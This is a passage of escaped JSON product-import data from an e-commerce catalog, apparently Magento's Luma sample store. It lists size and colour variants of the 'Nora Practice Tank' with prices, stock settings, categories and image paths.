Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Nora Practice Tank-S-Orange\",\"description\":\"<p>A closet go-to, the Nora Practice Tank can be worn at or after workouts or beneath a baggy tee for a laid-back style. Perfect fit and very comfortable!<\\/p>\\n<p>&bull; Pink stripped tank with side rouching.<br \\/>&bull; Pre-shrunk.<br \\/>&bull; Garment dyed.<br \\/>&bull; 92% Organic Cotton\\/8% Lycra.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nora-practice-tank-s-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt03-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt03-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt03-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt03-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt03-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Orange\"},\"1658\":{\"sku\":\"WT03-S-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Nora Practice Tank-S-Purple\",\"description\":\"<p>A closet go-to, the Nora Practice Tank can be worn at or after workouts or beneath a baggy tee for a laid-back style. Perfect fit and very comfortable!<\\/p>\\n<p>&bull; Pink stripped tank with side rouching.<br \\/>&bull; Pre-shrunk.<br \\/>&bull; Garment dyed.<br \\/>&bull; 92% Organic Cotton\\/8% Lycra.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nora-practice-tank-s-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt03-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt03-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt03-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt03-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt03-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Purple\"},\"1659\":{\"sku\":\"WT03-S-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Nora Practice Tank-S-Red\",\"description\":\"<p>A closet go-to, the Nora Practice Tank can be worn at or after workouts or beneath a baggy tee for a laid-back style. Perfect fit and very comfortable!<\\/p>\\n<p>&bull; Pink stripped tank with side rouching.<br \\/>&bull; Pre-shrunk.<br \\/>&bull; Garment dyed.<br \\/>&bull; 92% Organic Cotton\\/8% Lycra.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nora-practice-tank-s-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt03-red_alt1.jpg,\\/w\\/t\\/wt03-red_back.jpg\",\"image\":\"\\/w\\/t\\/wt03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt03-red_alt1.jpg,\\/w\\/t\\/wt03-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Red\"},\"1660\":{\"sku\":\"WT03-M-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Nora Practice Tank-M-Orange\",\"description\":\"<p>A closet go-to, the Nora Practice Tank can be worn at or after workouts or beneath a baggy tee for a laid-back style. Perfect fit and very comfortable!<\\/p>\\n<p>&bull; Pink stripped tank with side rouching.<br \\/>&bull; Pre-shrunk.<br \\/>&bull; Garment dyed.<br \\/>&bull; 92% Organic Cotton\\/8% Lycra.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nora-practice-tank-m-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt03-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt03-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt03-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt03-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt03-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Orange\"},\"1661\":{\"sku\":\"WT03-M-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Nora Practice Tank-M-Purple\",\"description\":\"<p>A closet go-to, the Nora Practice Tank can be worn at or after workouts or beneath a baggy tee for a laid-back style. Perfect fit and very comfortable!<\\/p>\\n<p>&bull; Pink stripped tank with side rouching.<br \\/>&bull; Pre-shrunk.<br \\/>&bull; Garment dyed.<br \\/>&bull; 92% Organic Cotton\\/8% Lycra.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nora-practice-tank-m-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt03-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt03-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt03-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt03-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt03-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Purple\"},\"1662\":{\"sku\":\"WT03-M-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Nora Practice Tank-M-Red\",\"description\":\"<p>A closet go-to, the Nora Practice Tank can be worn at or after workouts or beneath a baggy tee for a laid-back style. Perfect fit and very comfortable!<\\/p>\\n<p>&bull; Pink stripped tank with side rouching.<br \\/>&bull; Pre-shrunk.<br \\/>&bull; Garment dyed.<br \\/>&bull; 92% Organic Cotton\\/8% Lycra.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nora-practice-tank-m-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt03-red_alt1.jpg,\\/w\\/t\\/wt03-red_back.jpg\",\"image\":\"\\/w\\/t\\/wt03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt03-red_alt1.jpg,\\/w\\/t\\/wt03-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Red\"},\"1663\":{\"sku\":\"WT03-L-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Nora Practice Tank-L-Orange\",\"description\":\"<p>A closet go-to, the Nora Practice Tank can be worn at or after workouts or beneath a baggy tee for a laid-back style. Perfect fit and very comfortable!<\\/p>\\n<p>&bull; Pink stripped tank with side rouching.<br \\/>&bull; Pre-shrunk.<br \\/>&bull; Garment dyed.<br \\/>&bull; 92% Organic Cotton\\/8% Lycra.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nora-practice-tank-l-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt03-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt03-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt03-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt03-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt03-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Orange\"},\"1664\":{\"sku\":\"WT03-L-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Nora Practice Tank-L-Purple\",\"description\":\"<p>A closet go-to, the Nora Practice Tank can be worn at or after workouts or beneath a baggy tee for a laid-back style. Perfect fit and very comfortable!<\\/p>\\n<p>&bull; Pink stripped tank with side rouching.<br \\/>&bull; Pre-shrunk.<br \\/>&bull; Garment dyed.<br \\/>&bull; 92% Organic Cotton\\/8% Lycra.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nora-practice-tank-l-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt03-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt03-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt03-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt03-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt03-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Purple\"},\"1665\":{\"sku\":\"WT03-L-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Nora Practice Tank-L-Red\",\"description\":\"<p>A closet go-to, the Nora Practice Tank can be worn at or after workouts or beneath a baggy tee for a laid-back style. Perfect fit and very comfortable!<\\/p>\\n<p>&bull; Pink stripped tank with side rouching.<br \\/>&bull; Pre-shrunk.<br \\/>&bull; Garment dyed.<br \\/>&bull; 92% Organic Cotton\\/8% Lycra.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nora-practice-tank-l-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt03-red_alt1.jpg,\\/w\\/t\\/wt03-red_back.jpg\",\"image\":\"\\/w\\/t\\/wt03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt03-red_alt1.jpg,\\/w\\/t\\/wt03-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_f